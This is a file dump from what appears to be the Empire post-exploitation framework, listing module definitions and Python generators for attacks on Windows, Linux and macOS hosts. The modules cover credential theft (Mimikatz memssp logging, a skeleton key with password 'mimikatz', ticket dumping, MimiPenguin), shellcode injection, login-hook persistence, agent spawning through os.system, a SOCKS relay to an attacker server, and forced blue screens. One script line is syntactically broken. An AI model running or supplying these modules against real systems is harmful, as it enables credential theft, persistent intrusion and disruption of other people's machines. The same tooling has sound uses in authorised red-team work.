29 |     value: ''
30 | advanced:
31 |   custom_generate: true
32 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/persistence/misc/memssp.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz memssp
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to execute misc::memssp
10 |   to log all authentication events to C:\Windows\System32\mimisla.log.
11 | software: S0194
12 | tactics: [TA0004, TA0006]
13 | techniques: [T1101.005, T1056]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: false
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command '"misc::memssp"'; 'memssp installed, check C:\Windows\System32\mimisla.log
30 |   for logon events.'
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/persistence/misc/skeleton_key.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Mimikatz SkeletonKey
 2 | authors:
 3 |   - name: Joseph Bialek
 4 |     handle: '@JosephBialek'
 5 |     link: https://twitter.com/JosephBialek
 6 |   - name: Benjamin Delpy
 7 |     handle: '@gentilkiwi'
 8 |     link: https://twitter.com/gentilkiwi
 9 | description: Runs PowerSploit's Invoke-Mimikatz function to execute misc::skeleton
10 |   to implant a skeleton key w/ password 'mimikatz'. ONLY APPLICABLE ON DOMAIN CONTROLLERS!
11 | software: S0194
12 | tactics: [TA0004, TA0006]
13 | techniques: [T1556.001]
14 | background: true
15 | output_extension:
16 | needs_admin: true
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '2'
20 | comments:
21 |   - http://clymb3r.wordpress.com/
22 |   - http://blog.gentilkiwi.com
23 | options:
24 |   - name: Agent
25 |     description: Agent to run module on.
26 |     required: true
27 |     value: ''
28 | script_path: credentials/Invoke-Mimikatz.ps1
29 | script_end: Invoke-Mimikatz -Command "'misc::skeleton'"; 'Skeleton key implanted.
30 |   Use password mimikatz for access.'
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/privesc/watson.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-Watson
 2 | authors:
 3 |   - name: 'Daniel Duggan'
 4 |     handle: '@_RastaMouse'
 5 |     link: 'https://twitter.com/_rastamouse'
 6 |   - name: ''
 7 |     handle: '@S3cur3Th1sSh1t'
 8 |     link: https://twitter.com/ShitSecure
 9 | description: Watson is a .NET tool designed to enumerate missing KBs and suggest
10 |   exploits for Privilege Escalation vulnerabilities.
11 | software: ''
12 | tactics: [TA0007]
13 | techniques: [T1012, T1518, T1082]
14 | background: true
15 | output_extension:
16 | needs_admin: false
17 | opsec_safe: true
18 | language: powershell
19 | min_language_version: '4'
20 | comments:
21 |   - https://github.com/rasta-mouse/Watson
22 | options:
23 |   - name: Agent
24 |     description: Agent to run module on.
25 |     required: true
26 |     value: ''
27 | script_path: privesc/Invoke-Watson.ps1
28 | script_end: Invoke-Watson | %{$_ + "`n"}; 'Invoke-Watson completed'
29 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/situational_awareness/host/winenum.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-WinEnum
 2 | authors:
 3 |   - name: Chris Ross
 4 |     handle: '@xorrior'
 5 |     link: https://twitter.com/xorrior
 6 | description: Collects revelant information about a host and the current user context.
 7 | software: ''
 8 | tactics: [TA0007]
 9 | techniques: [T1082]
10 | background: true
11 | output_extension:
12 | needs_admin: false
13 | opsec_safe: true
14 | language: powershell
15 | min_language_version: '2'
16 | comments:
17 |   - https://github.com/xorrior/RandomPS-Scripts/blob/master/Invoke-WindowsEnum.ps1
18 | options:
19 |   - name: Agent
20 |     description: Agent to run module on.
21 |     required: true
22 |     value: ''
23 |   - name: Keywords
24 |     description: Array of keywords to use in file searches.
25 |     required: false
26 |     value: ''
27 |   - name: UserName
28 |     description: UserName to enumerate. Defaults to the current user context.
29 |     required: false
30 |     value: ''
31 | script_path: situational_awareness/host/Invoke-WinEnum.ps1
32 | script_end: Invoke-WinEnum {{ PARAMS }}
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/trollsploit/invoke_bsod.yaml:
--------------------------------------------------------------------------------
 1 | name: Invoke-BSOD
 2 | authors:
 3 |   - name: 'Barrett Adams'
 4 |     handle: '@peewpw'
 5 |     link: 'https://x.com/peewpw'
 6 | description: A PowerShell script to induce a Blue Screen of Death (BSOD) without
 7 |   admin privileges. Also enumerates Windows crash dump settings.
 8 | software: ''
 9 | tactics: [TA0040]
10 | techniques: [T1499]
11 | background: true
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: false
15 | language: powershell
16 | min_language_version: '2'
17 | comments:
18 |   - https://github.com/peewpw/Invoke-BSOD
19 | options:
20 |   - name: Agent
21 |     description: Agent to run module on.
22 |     required: true
23 |     value: ''
24 | script_path: fun/Invoke-BSOD.ps1
25 | script_end: Invoke-BSOD
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/powershell/trollsploit/rick_astley.yaml:
--------------------------------------------------------------------------------
 1 | name: Get-RickAstley
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@SadProcessor'
 5 |     link: ''
 6 |   - name: Will Schroeder
 7 |     handle: '@harmj0y'
 8 |     link: https://twitter.com/harmj0y
 9 | description: Runs @SadProcessor's beeping rickroll.
10 | software: ''
11 | tactics: [TA0040]
12 | techniques: [T1491.001]
13 | background: true
14 | output_extension:
15 | needs_admin: false
16 | opsec_safe: false
17 | language: powershell
18 | min_language_version: '2'
19 | comments:
20 |   - https://gist.github.com/SadProcessor/3e413f9542b01ee90979
21 | options:
22 |   - name: Agent
23 |     description: Agent to run module on.
24 |     required: true
25 |     value: ''
26 | script: empire/server/data/module_source/trollsploit/Get-RickAstley.ps1
27 | script_end: Get-RickAstley | Out-String | %{$_ + "`n"};"`nGet-RickAstley completed!
28 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/code_execution/invoke_script.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ):
14 |         script, err = main_menu.modulesv2.get_module_source(
15 |             module_name=module.script_path
16 |         )
17 | 
18 |         script_end = "\nmain(None,"
19 | 
20 |         if params["File"]:
21 |             encoded_script = params["File"].get_base64_file()
22 |             script_end += f" None, '{encoded_script}'"
23 |         elif params["ScriptUrl"]:
24 |             script_end += f" '{params['ScriptUrl']}'"
25 | 
26 |         if params.get("FunctionCommand"):
27 |             script_end += f", '{params['FunctionCommand']}'"
28 | 
29 |         script_end += ")"  # Ensure we close the parentheses here
30 | 
31 |         return script + script_end
32 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/collection/linux/mimipenguin.yaml:
--------------------------------------------------------------------------------
 1 | name: Linux MimiPenguin
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@rvrsh3ll'
 5 |     link: ''
 6 | description: Port of huntergregal mimipenguin. Harvest's current user's cleartext
 7 |   credentials.
 8 | software: S0179
 9 | tactics: []
10 | techniques:
11 |   - T1003
12 | background: false
13 | output_extension: ''
14 | needs_admin: true
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '3'
18 | comments: []
19 | options:
20 |   - name: Agent
21 |     description: Agent to execute module on.
22 |     required: true
23 |     value: ''
24 | script_path: python/collection/mimipenguin.py
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/collection/osx/native_screenshot_mss.yaml:
--------------------------------------------------------------------------------
 1 | name: NativeScreenshotMSS
 2 | authors:
 3 |   - name: Chris Ross
 4 |     handle: '@xorrior'
 5 |     link: https://twitter.com/xorrior
 6 | description: Takes a screenshot of an OSX desktop using the Python mss module. The
 7 |   python-mss module utilizes ctypes and the CoreFoundation library.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1113
12 | background: false
13 | output_extension: png
14 | needs_admin: false
15 | opsec_safe: false
16 | language: python
17 | min_language_version: '2.6'
18 | comments: []
19 | options:
20 |   - name: Agent
21 |     description: Agent to execute module on.
22 |     required: true
23 |     value: ''
24 |   - name: SavePath
25 |     description: Monitor to obtain a screenshot. 0 represents all.
26 |     required: true
27 |     value: /tmp/debug.png
28 |   - name: Monitor
29 |     description: Monitor to obtain a screenshot. -1 represents all.
30 |     required: true
31 |     value: '-1'
32 | advanced:
33 |   custom_generate: true
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/collection/osx/search_email.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | 
 4 | 
 5 | class Module:
 6 |     @staticmethod
 7 |     def generate(
 8 |         main_menu: MainMenu,
 9 |         module: EmpireModule,
10 |         params: dict,
11 |         obfuscate: bool = False,
12 |         obfuscation_command: str = "",
13 |     ) -> tuple[str | None, str | None]:
14 |         searchTerm = params["SearchTerm"]
15 | 
16 |         script = 'cmd = "find /Users/ -name *.emlx 2>/dev/null'
17 | 
18 |         if searchTerm != "":
19 |             script += "|xargs grep -i '" + searchTerm + "'\""
20 |         else:
21 |             script += '"'
22 | 
23 |         script += "\nrun_command(cmd)"
24 | 
25 |         return script
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/collection/osx/search_email.yaml:
--------------------------------------------------------------------------------
 1 | name: SearchEmail
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Searches for Mail .emlx messages, optionally only returning messages
 7 |   with the specified SearchTerm.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1114
12 | background: false
13 | output_extension: ''
14 | needs_admin: false
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '2.6'
18 | comments:
19 |   - https://davidkoepi.wordpress.com/2013/07/06/macforensics5/
20 | options:
21 |   - name: Agent
22 |     description: Agent to execute module on.
23 |     required: true
24 |     value: ''
25 |   - name: SearchTerm
26 |     description: Term to grep for in email messages.
27 |     required: false
28 |     value: ''
29 | advanced:
30 |   custom_generate: true
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/collection/windows/TicketDumper.yml:
--------------------------------------------------------------------------------
 1 | name: TicketDumper
 2 | authors:
 3 |   - name: 'Jake Krasnov'
 4 |     handle: '@hubbl3'
 5 |     link: ''
 6 | description: uses IronPython to dump tickets in the same way that klist.exe does
 7 | tactics: []
 8 | techniques:
 9 |   - T1558
10 | background: true
11 | output_extension: ''
12 | needs_admin: true
13 | opsec_safe: true
14 | language: python
15 | min_language_version: '3'
16 | comments:
17 |   - https://github.com/Hubbl3/IronOffense
18 |   - https://gitlab.com/KevinJClark/csharptoolbox/-/blob/master/Kex.cs?ref_type=heads
19 | options:
20 |   - name: Agent
21 |     description: Agent to execute module on.
22 |     required: true
23 |     value: ''
24 | script_path: python/collection/TicketDumper.py
25 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/discovery/nameserver.yaml:
--------------------------------------------------------------------------------
 1 | name: Nameserver IP
 2 | authors:
 3 |   - name: '0x636f646f'
 4 |     handle: '@BuildAndDestroy'
 5 |     link: https://github.com/BuildAndDestroy
 6 | description: Retrieve the nameserver IPv4 Address
 7 | software: ''
 8 | techniques:
 9 |   - T1016.001
10 | background: false
11 | output_extension: ''
12 | needs_admin: false
13 | opsec_safe: false
14 | language: python
15 | min_language_version: '3.6'
16 | comments:
17 |   - https://attack.mitre.org/techniques/T1016/001/
18 | options:
19 |   - name: Agent
20 |     description: Agent to execute module on
21 |     required: true
22 |     value: ''
23 | script_path: 'python/discovery/nameserver.py'
24 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/management/multi/socks.yaml:
--------------------------------------------------------------------------------
 1 | name: SOCKSv5 Proxy
 2 | authors:
 3 |   - name: klustic
 4 |     handle: ''
 5 |     link: ''
 6 | description: Spawn an AROX relay to extend a SOCKS proxy through your agent.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1090
11 | background: true
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: python
16 | min_language_version: '3'
17 | comments:
18 |   - You must set up a standalone AlmondRocks server for this to connect to! Refer
19 |     to the AlmondRocks Github project for more details.
20 |   - 'Repo: https://github.com/Cx01N/AlmondRocks/'
21 | options:
22 |   - name: Agent
23 |     description: Agent to run the AROX relay on
24 |     required: true
25 |     value: ''
26 |   - name: server
27 |     description: FQDN/IPv4 and port of the AROX server (e.g. 1.2.3.4:443 or hax0r.com:443)
28 |     required: true
29 |     value: ''
30 | script_path: python/management/socks.py
31 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/management/multi/spawn.py:
--------------------------------------------------------------------------------
 1 | from empire.server.common.empire import MainMenu
 2 | from empire.server.core.module_models import EmpireModule
 3 | from empire.server.utils.module_util import handle_error_message
 4 | 
 5 | 
 6 | class Module:
 7 |     @staticmethod
 8 |     def generate(
 9 |         main_menu: MainMenu,
10 |         module: EmpireModule,
11 |         params: dict,
12 |         obfuscate: bool = False,
13 |         obfuscation_command: str = "",
14 |     ):
15 |         # extract all of our options
16 |         listener_name = params["Listener"]
17 |         user_agent = params["UserAgent"]
18 | 
19 |         # generate the launcher code
20 |         launcher = main_menu.stagergenv2.generate_launcher(
21 |             listener_name, language="python", user_agent=user_agent
22 |         )
23 | 
24 |         if launcher == "":
25 |             return handle_error_message("[!] Error in launcher command generation.")
26 | 
27 |         launcher = launcher.replace('"', '\\"')
28 |         return f'import os; os.system("{launcher}")'
29 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/management/multi/spawn.yaml:
--------------------------------------------------------------------------------
 1 | name: Spawn
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Spawns a new Empire agent.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1050
11 | background: true
12 | output_extension: ''
13 | needs_admin: false
14 | opsec_safe: true
15 | language: python
16 | min_language_version: '3'
17 | comments: []
18 | options:
19 |   - name: Agent
20 |     description: Agent to execute module on.
21 |     required: true
22 |     value: ''
23 |   - name: Listener
24 |     description: Listener to use.
25 |     required: true
26 |     value: ''
27 |   - name: UserAgent
28 |     description: User-agent string to use for the staging request (default, none,
29 |       or other).
30 |     required: false
31 |     value: default
32 | advanced:
33 |   custom_generate: true
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/management/osx/shellcodeinject64.yaml:
--------------------------------------------------------------------------------
 1 | name: Shellcode Inject x64
 2 | authors:
 3 |   - name: Chris Ross
 4 |     handle: '@xorrior'
 5 |     link: https://twitter.com/xorrior
 6 |   - name: ''
 7 |     handle: '@midnite_runr'
 8 |     link: ''
 9 | description: Inject shellcode into a x64 bit process
10 | software: ''
11 | tactics:
12 |   - TA0002
13 |   - TA0005
14 |   - TA0004
15 | techniques:
16 |   - T1059
17 |   - T1055
18 |   - T1055.001
19 | background: false
20 | output_extension:
21 | needs_admin: true
22 | opsec_safe: true
23 | language: python
24 | min_language_version: '2.6'
25 | comments:
26 |   - comment
27 |   - https://github.com/secretsquirrel/osx_mach_stuff/blob/master/inject.c
28 | options:
29 |   - name: Agent
30 |     description: Agent to run the module on
31 |     required: true
32 |     value: ''
33 |   - name: PID
34 |     description: Process ID
35 |     required: true
36 |     value: ''
37 |   - name: Shellcode
38 |     description: local path to bin file containing x64 shellcode
39 |     required: true
40 |     value: ''
41 | advanced:
42 |   custom_generate: true
43 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/persistence/osx/loginhook.yaml:
--------------------------------------------------------------------------------
 1 | name: LoginHook
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@Killswitch-GUI'
 5 |     link: ''
 6 | description: Installs Empire agent via LoginHook.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1037
11 | background: false
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: false
15 | language: python
16 | min_language_version: '2.6'
17 | comments:
18 |   - https://support.apple.com/de-at/HT2420
19 | options:
20 |   - name: Agent
21 |     description: Agent to execute module on.
22 |     required: true
23 |     value: ''
24 |   - name: Password
25 |     description: User password for sudo.
26 |     required: true
27 |     value: ''
28 |   - name: LoginHookScript
29 |     description: Full path of the script to be executed/
30 |     required: true
31 |     value: /Users/Username/Desktop/kill-me.sh
32 | advanced:
33 |   custom_generate: true
34 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/privesc/linux/linux_priv_checker.yaml:
--------------------------------------------------------------------------------
 1 | name: LinuxPrivChecker
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@sleventyeleven'
 5 |     link: ''
 6 |   - name: ''
 7 |     handle: '@Cx01N'
 8 |     link: ''
 9 | description: This script is intended to be executed locally ona Linux box to enumerate
10 |   basic system info, and search for commonprivilege escalation vectors with pure
11 |   python.
12 | software: ''
13 | tactics: []
14 | techniques:
15 |   - T1166
16 | background: true
17 | output_extension: ''
18 | needs_admin: false
19 | opsec_safe: false
20 | language: python
21 | min_language_version: '3'
22 | comments:
23 |   - 'https://github.com/sleventyeleven/linuxprivchecker'
24 | options:
25 |   - name: Agent
26 |     description: Agent to run on.
27 |     required: true
28 |     value: ''
29 | script_path: 'python/privesc/linuxprivchecker.py'
30 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/host/multi/SuidGuidSearch.yaml:
--------------------------------------------------------------------------------
 1 | name: Search for world writeable files
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: This module can be used to identify suid or guid bit set on files.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1426
11 | background: true
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: python
16 | min_language_version: '2.6'
17 | comments:
18 |   - ''
19 | options:
20 |   - name: Agent
21 |     description: Agent to run the module on.
22 |     required: true
23 |     value: ''
24 |   - name: Path
25 |     description: 'Path to start the search from. Default is / '
26 |     required: true
27 |     value: /
28 | script: |-
29 |   import os
30 |   import subprocess
31 |   cmd = "find {{ Path }} -type f \( -perm -g=s -o -perm -u=s \) \-exec ls -lg \{\} \;"
32 |   print(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read())
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/host/multi/WorldWriteableFileSearch.yaml:
--------------------------------------------------------------------------------
 1 | name: Search for world writeable files
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: This module can be used to identify world writeable files.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1083
11 | background: true
12 | output_extension:
13 | needs_admin: false
14 | opsec_safe: true
15 | language: python
16 | min_language_version: '2.6'
17 | comments:
18 |   - ''
19 | options:
20 |   - name: Agent
21 |     description: Agent to run the module on.
22 |     required: true
23 |     value: ''
24 |   - name: Path
25 |     description: 'Path to start the search from. Default is / '
26 |     required: true
27 |     value: /
28 | script: |-
29 |   import os
30 |   import subprocess
31 |   cmd = "find {{ Path }} -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print"
32 |   print)subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE).stdout.read())
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/host/multi/linpeas.yaml:
--------------------------------------------------------------------------------
 1 | name: LinPEAS
 2 | authors:
 3 |   - name: Anthony Rose
 4 |     handle: Cx01N
 5 |     link: https://twitter.com/Cx01N_
 6 | description: LinPEAS is a script that search for possible paths to escalate privileges
 7 |   on Linux/Unix*/MacOS hosts.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1046
12 | background: true
13 | output_extension:
14 | needs_admin: false
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '3'
18 | comments:
19 |   - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
20 | options:
21 |   - name: Agent
22 |     description: Agent to run on.
23 |     required: true
24 |     value: ''
25 | script_path: python/situational_awareness/LinPEAS.py
26 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/host/osx/situational_awareness.yaml:
--------------------------------------------------------------------------------
 1 | name: Situational Awareness
 2 | authors:
 3 |   - name: Alex Rymdeko-Harvey
 4 |     handle: ''
 5 |     link: ''
 6 |   - name: ''
 7 |     handle: '@Killswitch-GUI'
 8 |     link: ''
 9 | description: This module will enumerate the basic items needed for OP.
10 | software: ''
11 | tactics: []
12 | techniques:
13 |   - T1082
14 | background: false
15 | output_extension: ''
16 | needs_admin: false
17 | opsec_safe: true
18 | language: python
19 | min_language_version: '2.6'
20 | comments:
21 |   - ''
22 | options:
23 |   - name: Agent
24 |     description: Agent to run from.
25 |     required: true
26 |     value: ''
27 |   - name: HistoryCount
28 |     description: The number of messages to enumerate from most recent.
29 |     required: true
30 |     value: '10'
31 |   - name: Debug
32 |     description: Enable a find keyword to search for within the iMessage Database.
33 |     required: true
34 |     value: 'False'
35 |     strict: true
36 |     suggested_values:
37 |       - True
38 |       - False
39 | advanced:
40 |   custom_generate: true
41 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/network/active_directory/dscl_get_groupmembers.yaml:
--------------------------------------------------------------------------------
 1 | name: dscl Get-GroupMembers
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: This module will use the current user context to query active directory
 7 |   for a list of users in a group.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1482
12 | background: false
13 | output_extension: ''
14 | needs_admin: false
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '2.6'
18 | comments:
19 |   - ''
20 | options:
21 |   - name: Agent
22 |     description: Agent to run on.
23 |     required: true
24 |     value: ''
25 |   - name: Group
26 |     description: Group
27 |     required: true
28 |     value: ''
29 | script: |-
30 |   import subprocess
31 |   cmd = \"""dscl /Search read "/Groups/{{ Group }}" GroupMembership\"""
32 |   print(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.read())
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/network/active_directory/dscl_get_groups.yaml:
--------------------------------------------------------------------------------
 1 | name: dscl Get-Groups
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: This module will use the current user context to query active directory
 7 |   for a list of Groups.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1482
12 | background: false
13 | output_extension: ''
14 | needs_admin: false
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '2.6'
18 | comments:
19 |   - ''
20 | options:
21 |   - name: Agent
22 |     description: Agent to run on.
23 |     required: true
24 |     value: ''
25 |   - name: Domain
26 |     description: Domain
27 |     required: true
28 |     value: ''
29 | script: |-
30 |   import subprocess
31 |   cmd = \"""dscl "/Active Directory/{{ Domain }}/All Domains/" -list /Groups\"""
32 |   print(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.read())
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/situational_awareness/network/active_directory/dscl_get_users.yaml:
--------------------------------------------------------------------------------
 1 | name: dscl Get-Users
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: This module will use the current user context to query active directory
 7 |   for a list of users.
 8 | software: ''
 9 | tactics: []
10 | techniques:
11 |   - T1482
12 | background: false
13 | output_extension: ''
14 | needs_admin: false
15 | opsec_safe: true
16 | language: python
17 | min_language_version: '2.6'
18 | comments:
19 |   - ''
20 | options:
21 |   - name: Agent
22 |     description: Agent to run on.
23 |     required: true
24 |     value: ''
25 |   - name: Domain
26 |     description: Domain
27 |     required: true
28 |     value: ''
29 | script: |-
30 |   import subprocess
31 |   cmd = \"""dscl "/Active Directory/{{ Domain }}/All Domains/" -list /Users\"""
32 |   print(subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE).stdout.read())
33 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/trollsploit/osx/say.yaml:
--------------------------------------------------------------------------------
 1 | name: Say
 2 | authors:
 3 |   - name: Will Schroeder
 4 |     handle: '@harmj0y'
 5 |     link: https://twitter.com/harmj0y
 6 | description: Performs text to speech using "say".
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1491
11 | background: false
12 | output_extension: ''
13 | needs_admin: false
14 | opsec_safe: false
15 | language: python
16 | min_language_version: '2.6'
17 | comments: []
18 | options:
19 |   - name: Agent
20 |     description: Agent to execute module on.
21 |     required: true
22 |     value: ''
23 |   - name: Text
24 |     description: The text to speak.
25 |     required: true
26 |     value: ''
27 |   - name: Voice
28 |     description: The voice to use.
29 |     required: true
30 |     value: alex
31 | script: run_command('say -v {{ Voice }} {{ Text }}')
32 | 


--------------------------------------------------------------------------------
/empire/server/modules/python/trollsploit/osx/thunderstruck.yaml:
--------------------------------------------------------------------------------
 1 | name: Open Safari in the background and play Thunderstruck.
 2 | authors:
 3 |   - name: ''
 4 |     handle: '@424f424f'
 5 |     link: https://twitter.com/424f424f
 6 | description: Open Safari in the background and play Thunderstruck.
 7 | software: ''
 8 | tactics: []
 9 | techniques:
10 |   - T1491
11 | background: false
12 | output_extension: ''
13 | needs_admin: false
14 | opsec_safe: false
15 | language: python
16 | min_language_version: '2.6'
17 | comments:
18 |   - ''
19 | options:
20 |   - name: Agent
21 |     description: Agent to run on.
22 |     required: true
23 |     value: ''
24 | script: |-
25 |   import subprocess
26 | 
27 |   try:
28 |       volume = \"""osascript -e "set Volume 100" ""\"
29 |       process1 = subprocess.Popen(volume, stdout=subprocess.PIPE, shell=True)
30 |       cmd = \"""open -a "Safari" -g -j https://www.youtube.com/watch?v=v2AC41dglnM""\"
31 |       process2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
32 |       print("Thunderstruck engaged!")
33 | 
34 |   except Exception as e:
35 |       print("Module failed")
36 |       print(e)
37 | 


--------------------------------------------------------------------------------
/empire/server/plugins/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/plugins/__init__.py


--------------------------------------------------------------------------------
/empire/server/plugins/basic_reporting/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/plugins/basic_reporting/__init__.py


--------------------------------------------------------------------------------
/empire/server/plugins/basic_reporting/plugin.yaml:
--------------------------------------------------------------------------------
1 | name: Basic Reporting
2 | authors:
3 |   - name: Vincent Rose
4 |     handle: '@vinnybod'
5 |     link: https://github.com/vinnybod
6 | software: ''
7 | techniques: []
8 | main: basic_reporting.py
9 | 


--------------------------------------------------------------------------------
/empire/server/plugins/example/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/plugins/example/__init__.py


--------------------------------------------------------------------------------
/empire/server/plugins/example/example_helpers.py:
--------------------------------------------------------------------------------
1 | def this_is_an_example_function():
2 |     return True
3 | 


--------------------------------------------------------------------------------
/empire/server/plugins/example/plugin.yaml:
--------------------------------------------------------------------------------
 1 | name: example
 2 | authors:
 3 |   - name: Author 1
 4 |     handle: '@author1'
 5 |     link: https://twitter.com/author1
 6 | description: |
 7 |   A description of what the module does and how it works.
 8 | # Software and tools that from the MITRE ATT&CK framework (https://attack.mitre.org/software/)
 9 | software:
10 | # Techniques that from the MITRE ATT&CK framework (https://attack.mitre.org/techniques/enterprise/)
11 | techniques:
12 |   - TXXXX
13 |   - TXXXX
14 | comments:
15 |   - Any additional comments about the module.
16 | # The entry point for the plugin. The file that contains the `Plugin` class.
17 | main: example.py
18 | auto_start: true
19 | auto_execute:
20 |   enabled: true
21 |   options:
22 |     Status: start
23 |     Message: Hello World!
24 | 


--------------------------------------------------------------------------------
/empire/server/utils/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/BC-SECURITY/Empire/34c0f16e1bda19397b033764d435af76266ab1b0/empire/server/utils/__init__.py


--------------------------------------------------------------------------------
/empire/server/utils/datetime_util.py:
--------------------------------------------------------------------------------
 1 | from datetime import UTC, datetime
 2 | 
 3 | 
 4 | def is_stale(lastseen: datetime, delay: int, jitter: float):
 5 |     """
 6 |     Convenience function for calculating staleness
 7 |     """
 8 |     interval_max = (delay + delay * jitter) + 30
 9 |     diff = getutcnow() - lastseen
10 |     return diff.total_seconds() > interval_max
11 | 
12 | 
13 | def getutcnow():
14 |     return datetime.now(UTC)
15 | 


--------------------------------------------------------------------------------
/empire/server/utils/math_util.py:
--------------------------------------------------------------------------------
 1 | import numbers
 2 | 
 3 | 
 4 | def old_div(a, b):
 5 |     """
 6 |     Equivalent to ``a / b`` on Python 2 without ``from __future__ import
 7 |     division``.
 8 |     """
 9 |     if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
10 |         return a // b
11 |     return a / b
12 | 


--------------------------------------------------------------------------------
/empire/server/utils/string_util.py:
